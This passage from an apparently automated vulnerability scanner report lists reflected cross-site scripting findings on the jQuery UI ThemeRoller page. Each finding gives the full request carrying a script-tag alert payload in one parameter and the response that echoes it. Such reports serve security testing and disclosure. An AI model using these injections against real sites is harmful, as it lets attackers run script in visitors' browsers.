Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-seriffbdcf"><script>alert(1)</script>709d73031ae&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorC
...[SNIP]...

3.56. http://jqueryui.com/themeroller/ [fsDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16685"><script>alert(1)</script>dd0f9a34ef1 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%16685"><script>alert(1)</script>dd0f9a34ef1&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120320

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%16685"><script>alert(1)</script>dd0f9a34ef1&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent
...[SNIP]...

3.57. http://jqueryui.com/themeroller/ [fwDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f96a1"><script>alert(1)</script>5f3ea89b3c1 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=boldf96a1"><script>alert(1)</script>5f3ea89b3c1&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120257

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=boldf96a1"><script>alert(1)</script>5f3ea89b3c1&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&b
...[SNIP]...

3.58. http://jqueryui.com/themeroller/ [iconColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9339"><script>alert(1)</script>0658b12cb0b was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CCd9339"><script>alert(1)</script>0658b12cb0b&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CCd9339"><script>alert(1)</script>0658b12cb0b&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01
...[SNIP]...

3.59. http://jqueryui.com/themeroller/ [iconColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48a1c"><script>alert(1)</script>c4245844e06 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=66666648a1c"><script>alert(1)</script>c4245844e06&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=66666648a1c"><script>alert(1)</script>c4245844e06&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_s
...[SNIP]...

3.60. http://jqueryui.com/themeroller/ [iconColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2216b"><script>alert(1)</script>cae83cdb21e was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF2216b"><script>alert(1)</script>cae83cdb21e&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nt=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF2216b"><script>alert(1)</script>cae83cdb21e&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgO
...[SNIP]...

3.61. http://jqueryui.com/themeroller/ [iconColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa094"><script>alert(1)</script>fb9a666b652 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000fa094"><script>alert(1)</script>fb9a666b652&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000fa094"><script>alert(1)</script>fb9a666b652&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px
...[SNIP]...

3.62. http://jqueryui.com/themeroller/ [iconColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2df0"><script>alert(1)</script>9d2ae49d906 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFFa2df0"><script>alert(1)</script>9d2ae49d906&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFFa2df0"><script>alert(1)</script>9d2ae49d906&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.p
...[SNIP]...

3.63. http://jqueryui.com/themeroller/ [iconColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa12d"><script>alert(1)</script>5d0fca062f4 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000aa12d"><script>alert(1)</script>5d0fca062f4&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000aa12d"><script>alert(1)</script>5d0fca062f4&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

3.64. http://jqueryui.com/themeroller/ [iconColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df741"><script>alert(1)</script>1018a4cb3c8 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFFdf741"><script>alert(1)</script>1018a4cb3c8&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
